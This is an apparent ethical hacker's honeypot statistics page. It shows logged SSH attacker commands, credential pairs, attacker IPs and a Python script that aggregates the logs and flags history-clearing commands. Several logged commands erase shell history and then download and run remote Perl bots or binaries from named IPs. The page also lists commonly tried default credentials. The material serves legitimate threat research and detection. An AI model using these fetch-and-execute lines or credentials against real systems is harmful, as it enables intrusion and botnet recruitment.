
# Ethical Hacker & ICT Security Specialist

## Honeypot

In computing, a honeypot (literally: "pot of honey") is a hardware/software system or component used as bait in order to study and analyse cyber attacks in real time.

It usually consists of one or more sites or services that appear to be part of the network and to contain information valuable to an attacker, but which are in fact well isolated and hold no real data; instead, they give whoever administers them full details of the attacks they receive.

The primary value of a honeypot is therefore the information it yields about the nature and frequency of the attacks it receives.

If you are curious to discover this world, look at the real-time statistics of the attacks detected hour after hour by my honeypot network:

## Live dictionaries

Dictionaries of passwords, usernames and user/pass pairs extracted from the attacks against the SSH service can be downloaded:

All the honeypot statistics follow:

## SSH

### Last 50 commands executed

| Date | Command | Source |
|---|---|---|
| 2018-10-18 04:55:21 | `cd /tmp/lalala` | 14.248.73.250 Vietnam |
| 2018-10-18 04:55:07 | `rm -rf /tmp/lalala ; mkdir /tmp/lalala` | 14.248.73.250 Vietnam |
| 2018-10-18 04:54:51 | `exit` | 14.248.73.250 Vietnam |
| 2018-10-18 03:31:31 | `free -m` | 164.160.28.20 Tanzania, United Republic of |
| 2018-10-18 03:31:25 | `cat /proc/cpuinfo` | 164.160.28.20 Tanzania, United Republic of |
| 2018-10-18 03:31:18 | `ps -x` | 164.160.28.20 Tanzania, United Republic of |
| 2018-10-18 03:31:13 | `uname` | 164.160.28.20 Tanzania, United Republic of |
| 2018-10-18 03:31:08 | `unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH ; history -n ; export HISTFILE=/dev/null ; export HISTSIZE=0; export HISTFILESIZE=0;` | 164.160.28.20 Tanzania, United Republic of |
| 2018-10-17 18:43:20 | `uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;killall -9 perl;cd /var/tmp/;cd /tmp/;chattr -uais *;rm -rf y.txt;wget http://203.146.208.208/drago/images/.ssh/y.txt;mv y.txt w.txt;perl w.txt 162.243.233.156;lwp-download http://203.146.208.208/drago/images/.ssh/y.txt;mv y.txt lw.txt;perl lw.txt 162.243.233.156;fetch http://203.146.208.208/drago/images/.ssh/y.txt;mv y.txt fe.txt;perl fe.txt 162.243.233.156;curl -O http://203.146.208.208/drago/images/.ssh/y.txt;mv y.txt cu.txt;perl cu.txt 162.243.233.156;rm -rf w.txt fe.txt cu.txt lw.txt y.txt y.txt*;` | 178.19.130.191 France |
| 2018-10-17 18:26:00 | `uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;killall -9 perl;cd /var/tmp/;cd /tmp/;chattr -uais *;rm -rf y.txt;wget http://203.146.208.208/drago/images/.ssh/y.txt;mv y.txt w.txt;perl w.txt 162.243.233.156;lwp-download http://203.146.208.208/drago/images/.ssh/y.txt;mv y.txt lw.txt;perl lw.txt 162.243.233.156;fetch http://203.146.208.208/drago/images/.ssh/y.txt;mv y.txt fe.txt;perl fe.txt 162.243.233.156;curl -O http://203.146.208.208/drago/images/.ssh/y.txt;mv y.txt cu.txt;perl cu.txt 162.243.233.156;rm -rf w.txt fe.txt cu.txt lw.txt y.txt y.txt*;` | 128.199.157.152 Singapore |
| 2018-10-17 18:20:48 | `free -m` | 88.12.9.113 Spain |
| 2018-10-17 18:20:43 | `cat /proc/cpuinfo` | 88.12.9.113 Spain |
| 2018-10-17 18:20:37 | `ps -x` | 88.12.9.113 Spain |
| 2018-10-17 18:20:32 | `uname` | 88.12.9.113 Spain |
| 2018-10-17 18:20:27 | `unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH ; history -n ; export HISTFILE=/dev/null ; export HISTSIZE=0; export HISTFILESIZE=0;` | 88.12.9.113 Spain |
| 2018-10-17 16:50:39 | `free -m` | 185.244.25.177 Netherlands |
| 2018-10-17 16:50:34 | `cat /proc/cpuinfo` | 185.244.25.177 Netherlands |
| 2018-10-17 16:50:28 | `ps -x` | 185.244.25.177 Netherlands |
| 2018-10-17 16:50:24 | `uname` | 185.244.25.177 Netherlands |
| 2018-10-17 16:50:20 | `unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH ; history -n ; export HISTFILE=/dev/null ; export HISTSIZE=0; export HISTFILESIZE=0;` | 185.244.25.177 Netherlands |
| 2018-10-17 15:22:36 | `free -m` | 185.234.217.21 Ireland |
| 2018-10-17 15:22:31 | `cat /proc/cpuinfo` | 185.234.217.21 Ireland |
| 2018-10-17 15:22:26 | `uname` | 185.234.217.21 Ireland |
| 2018-10-17 15:22:21 | `killall -9 perl;cd /var/tmp/ ; cd /tmp/ ; rm -rf ssh1.txt ; wget http://185.234.217.21/ssh1.txt ; mv ssh1.txt wget.txt ; perl wget.txt 193.169.252.253 ; lwp-download http://185.234.217.21/ssh1.txt ; mv ssh1.txt lynx.txt ; perl lynx.txt 193.169.252.253 ; fetch http://185.234.217.21/ssh1.txt ; mv ssh1.txt fetch.txt ; perl fetch.txt 193.169.252.253 ; curl -O http://185.234.217.21/ssh1.txt ; mv ssh1.txt curl.txt ; perl curl.txt 193.169.252.253 ; rm -rf ssh1.txt wget.txt lynx.txt fetch.txt curl.txt` | 185.234.217.21 Ireland |
| 2018-10-17 14:50:39 | `free -m` | 185.234.217.21 Ireland |
| 2018-10-17 14:50:33 | `cat /proc/cpuinfo` | 185.234.217.21 Ireland |
| 2018-10-17 14:50:28 | `uname` | 185.234.217.21 Ireland |
| 2018-10-17 14:50:24 | `killall -9 perl;cd /var/tmp/ ; cd /tmp/ ; rm -rf ssh1.txt ; wget http://185.234.217.21/ssh1.txt ; mv ssh1.txt wget.txt ; perl wget.txt 193.169.252.253 ; lwp-download http://185.234.217.21/ssh1.txt ; mv ssh1.txt lynx.txt ; perl lynx.txt 193.169.252.253 ; fetch http://185.234.217.21/ssh1.txt ; mv ssh1.txt fetch.txt ; perl fetch.txt 193.169.252.253 ; curl -O http://185.234.217.21/ssh1.txt ; mv ssh1.txt curl.txt ; perl curl.txt 193.169.252.253 ; rm -rf ssh1.txt wget.txt lynx.txt fetch.txt curl.txt` | 185.234.217.21 Ireland |
| 2018-10-17 14:09:36 | `ls -la /var/run/gcc.pid` | 198.1.188.107 China |
| 2018-10-17 14:09:32 | `#!/bin/sh\ PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\ wget http://198.1.188.107/g3308l\ curl -O http://198.1.188.107/g3308l\ chmod +x g3308l\ ./g3308l\` | 198.1.188.107 |
| 2018-10-17 11:12:50 | `echo Hi \| cat -n` | 124.12.161.194 Taiwan |
| 2018-10-17 11:12:45 | `ps -ef \| grep '[Mm]iner'` | 124.12.161.194 Taiwan |
| 2018-10-17 11:12:39 | `ps \| grep '[Mm]iner'` | 124.12.161.194 Taiwan |
| 2018-10-17 11:12:33 | `cat /proc/cpuinfo` | 124.12.161.194 Taiwan |
| 2018-10-17 11:12:28 | `uname -a` | 124.12.161.194 Taiwan |
| 2018-10-17 11:12:23 | `ifconfig` | 124.12.161.194 Taiwan |
| 2018-10-17 11:12:07 | `/ip cloud print` | 124.12.161.194 Taiwan |
| 2018-10-17 11:12:07 | `/ip cloud print` | 124.12.161.194 Taiwan |
| 2018-10-17 07:39:49 | `free -m` | 192.119.69.82 United States |
| 2018-10-17 07:39:43 | `cat /proc/cpuinfo` | 192.119.69.82 United States |
| 2018-10-17 07:39:37 | `ps -x` | 192.119.69.82 United States |
| 2018-10-17 07:39:33 | `uname` | 192.119.69.82 United States |
| 2018-10-17 07:39:28 | `unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH ; history -n ; export HISTFILE=/dev/null ; export HISTSIZE=0; export HISTFILESIZE=0;` | 192.119.69.82 United States |
| 2018-10-17 07:07:15 | `ls -la /var/run/gcc.pid` | 198.1.188.107 China |
| 2018-10-17 07:07:10 | `#!/bin/sh\ PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\ wget http://198.1.188.107/g3308l\ curl -O http://198.1.188.107/g3308l\ chmod +x g3308l\ ./g3308l\` | 198.1.188.107 |
| 2018-10-17 05:16:53 | `cat >/tmp/.xs/daemon.armv4l.mod` | 94.213.132.65 Netherlands |
| 2018-10-17 05:16:49 | `mkdir /tmp/.xs/` | 94.213.132.65 Netherlands |
| 2018-10-17 05:13:15 | `cat >/tmp/.xs/daemon.armv4l.mod` | 94.213.132.65 Netherlands |
| 2018-10-17 05:13:10 | `mkdir /tmp/.xs/` | 94.213.132.65 Netherlands |
| 2018-10-17 05:13:00 | `cat /proc/version` | 94.213.132.65 Netherlands |
### Last 20 sessions

| Date | Source |
|---|---|
| 2018-11-15 02:53:58 | 150.138.183.254 China |
| 2018-11-15 02:51:36 | 5.101.40.100 Russian Federation |
| 2018-11-15 02:40:35 | 5.101.40.100 Russian Federation |
| 2018-11-15 02:39:23 | 193.169.252.230 |
| 2018-11-15 02:37:54 | 150.138.183.254 China |
| 2018-11-15 02:29:33 | 5.101.40.100 Russian Federation |
| 2018-11-15 02:21:48 | 150.138.183.254 China |
| 2018-11-15 02:18:37 | 5.101.40.100 Russian Federation |
| 2018-11-15 02:14:01 | 171.224.234.36 Vietnam |
| 2018-11-15 02:14:01 | 171.224.234.36 Vietnam |
| 2018-11-15 02:07:34 | 5.101.40.100 Russian Federation |
| 2018-11-15 02:05:26 | 150.138.183.254 China |
| 2018-11-15 01:56:35 | 5.101.40.100 Russian Federation |
| 2018-11-15 01:49:15 | 150.138.183.254 China |
| 2018-11-15 01:43:01 | 193.169.252.228 |
| 2018-11-15 01:37:30 | 5.101.40.166 Russian Federation |
| 2018-11-15 01:33:05 | 150.138.183.254 China |
| 2018-11-15 01:29:21 | 171.224.234.36 Vietnam |
| 2018-11-15 01:29:21 | 171.224.234.36 Vietnam |
| 2018-11-15 01:26:30 | 5.101.40.166 Russian Federation |
### Top 15 username/password pairs

| Count | Username | Password |
|---|---|---|
| 12994 | admin | admin123 |
| 1255 | admin | |
| 1100 | admin | aerohive |
| 741 | ubnt | ubnt |
| 215 | admin | admin |
| 121 | user | user |
| 119 | root | root |
| 118 | root | CactiEZ |
| 115 | root | admin |
| 101 | pi | raspberry |
| 98 | root | !@ |
| 82 | pi | raspberryraspberry993311 |
| 75 | root | |
| 74 | admin | password |
| 69 | support | support |
### Top 20 successful login IPs

| Count | Source |
|---|---|
| 1359 | 195.3.147.49 Latvia |
| 706 | 193.201.224.206 Ukraine |
| 200 | 178.19.130.191 France |
| 168 | 5.188.10.76 Croatia |
| 167 | 45.225.35.253 Brazil |
| 154 | 5.196.76.41 France |
| 153 | 38.84.132.236 United States |
| 141 | 159.203.36.38 Canada |
| 116 | 109.236.91.85 Netherlands |
| 103 | 128.199.157.152 Singapore |
| 102 | 54.37.235.210 Poland |
| 79 | 117.4.114.178 Vietnam |
| 77 | 194.63.141.141 Russian Federation |
| 77 | 116.31.116.28 China |
| 73 | 167.114.210.108 Canada |
| 60 | 13.58.243.139 United States |
| 59 | 62.244.196.50 Turkey |
| 57 | 204.12.206.98 United States |
| 55 | 5.188.87.52 Russian Federation |
| 55 | 5.188.87.51 Russian Federation |
### Top 20 attackers

| Connections | Source |
|---|---|
| 2385 | 5.101.40.150 Russian Federation |
| 2322 | 150.138.183.254 China |
| 1826 | 5.101.40.172 Russian Federation |
| 1616 | 5.101.40.149 Russian Federation |
| 1416 | 195.3.147.49 Latvia |
| 1401 | 54.175.87.142 United States |
| 1174 | 182.61.56.5 China |
| 1146 | 5.101.40.101 Russian Federation |
| 1064 | 111.231.66.173 China |
| 1038 | 5.101.40.100 Russian Federation |
| 957 | 171.231.51.180 Vietnam |
| 953 | 146.0.77.128 Netherlands |
| 913 | 146.0.77.173 Netherlands |
| 830 | 5.101.40.106 Russian Federation |
| 790 | 192.187.103.6 United States |
| 759 | 192.187.103.5 United States |
| 758 | 192.187.103.3 United States |
| 729 | 193.201.224.206 Ukraine |
| 723 | 173.208.192.22 United States |
| 718 | 5.101.40.159 Russian Federation |
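The aggregation that produces tables like the ones above, and the user/pass dictionary offered for download, can be written in a few dozen lines. The following is an added example, not the page's own code and not taken from the HoneyStats project: it assumes the honeypot writes one JSON object per line with the fields `ts`, `src`, `type`, `user`, `pw`, `ok` and `cmd` (an assumed format; the sample events are constructed), derives the top credential pairs, the sources with the most login attempts, the sources that logged in successfully and a deduplicated `user:pass` dictionary, and additionally flags commands that try to disable shell history, the `unset ... HISTFILE` pattern that opens many of the sessions listed above and is a useful signal for an analyst triaging sessions.

```python
"""Aggregate SSH honeypot events into statistics of the kind shown above.

Added example, not part of the original page or of the HoneyStats project.
The input format (one JSON object per line, with the fields listed below)
is an assumption, and the sample events are constructed for illustration.
"""
import json
import re
from collections import Counter

# Constructed sample events (not real honeypot data).  Assumed fields:
#   ts   - timestamp of the event
#   src  - source IP of the attacker
#   type - "login" (with user, pw, ok) or "command" (with cmd)
# The truncated last line shows how a corrupt record is tolerated.
SAMPLE_LOG = """\
{"ts":"2018-10-17 07:39:20","src":"192.0.2.10","type":"login","user":"admin","pw":"admin123","ok":false}
{"ts":"2018-10-17 07:39:22","src":"192.0.2.10","type":"login","user":"admin","pw":"admin123","ok":false}
{"ts":"2018-10-17 07:39:24","src":"192.0.2.10","type":"login","user":"root","pw":"root","ok":true}
{"ts":"2018-10-17 07:39:28","src":"192.0.2.10","type":"command","cmd":"unset HISTORY HISTFILE ; export HISTFILE=/dev/null ; export HISTSIZE=0;"}
{"ts":"2018-10-17 07:39:33","src":"192.0.2.10","type":"command","cmd":"uname"}
{"ts":"2018-10-17 07:39:37","src":"192.0.2.10","type":"command","cmd":"cat /proc/cpuinfo"}
{"ts":"2018-10-17 11:12:00","src":"198.51.100.7","type":"login","user":"ubnt","pw":"ubnt","ok":true}
{"ts":"2018-10-17 11:12:07","src":"198.51.100.7","type":"command","cmd":"ps -ef | grep '[Mm]iner'"}
{"ts":"2018-10-17 14:50:00","src":"203.0.113.5","type":"login","user":"admin","pw":"admin123","ok":false}
{"ts":"2018-10-17 14:50:02","src":"203.0.113.5","type":"login","user":"pi","pw":"raspberry","ok":false}
{"ts":"2018-10-17 14:50:03","src":"203.0.113.5","type":"login","user":"pi"
"""

# Patterns that indicate an attacker trying to avoid leaving a shell history,
# a common first step in the sessions recorded above.
ANTI_FORENSICS = [
    re.compile(r"\bunset\s+.*HISTFILE"),
    re.compile(r"HISTFILE=/dev/null"),
    re.compile(r"\bHISTSIZE=0\b"),
]


def parse_events(text):
    """Parse JSON-lines honeypot output, skipping empty or corrupt lines."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            events.append(json.loads(line))
        except json.JSONDecodeError:
            continue  # one corrupt record must not abort the whole report
    return events


def top_credentials(events, n=15):
    """Most frequently tried (username, password) pairs, like the table above."""
    pairs = Counter((e["user"], e["pw"]) for e in events if e.get("type") == "login")
    return pairs.most_common(n)


def login_attempts_per_source(events, n=20):
    """Sources ranked by number of login attempts (successful or not)."""
    return Counter(e["src"] for e in events if e.get("type") == "login").most_common(n)


def successful_login_sources(events, n=20):
    """Sources ranked by number of successful logins."""
    ok = Counter(e["src"] for e in events if e.get("type") == "login" and e.get("ok"))
    return ok.most_common(n)


def flag_anti_forensics(events):
    """Return (src, cmd) for every command that tries to disable shell history."""
    hits = []
    for e in events:
        if e.get("type") != "command":
            continue
        cmd = e.get("cmd", "")
        if any(p.search(cmd) for p in ANTI_FORENSICS):
            hits.append((e["src"], cmd))
    return hits


def credential_dictionary(events):
    """Deduplicated, sorted user:pass lines, like the downloadable dictionaries."""
    pairs = sorted({(e["user"], e["pw"]) for e in events if e.get("type") == "login"})
    return "\n".join(f"{u}:{p}" for u, p in pairs)


if __name__ == "__main__":
    ev = parse_events(SAMPLE_LOG)
    print("parsed events:", len(ev))
    print("top credentials:", top_credentials(ev, 3))
    print("login attempts per source:", login_attempts_per_source(ev, 3))
    print("successful login sources:", successful_login_sources(ev))
    print("history-clearing commands:", flag_anti_forensics(ev))
    print("dictionary:\n" + credential_dictionary(ev))
```

On a real deployment the only change is reading the honeypot's log file instead of `SAMPLE_LOG`; the functions are deliberately separate so that each table on the page maps to one of them, and the anti-forensics flag can be fed into whatever alerting the operator already has.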

If you want to look at the code that generates this page, go to the site of my HoneyStats project! (github)

Want even more? Follow me into the lab!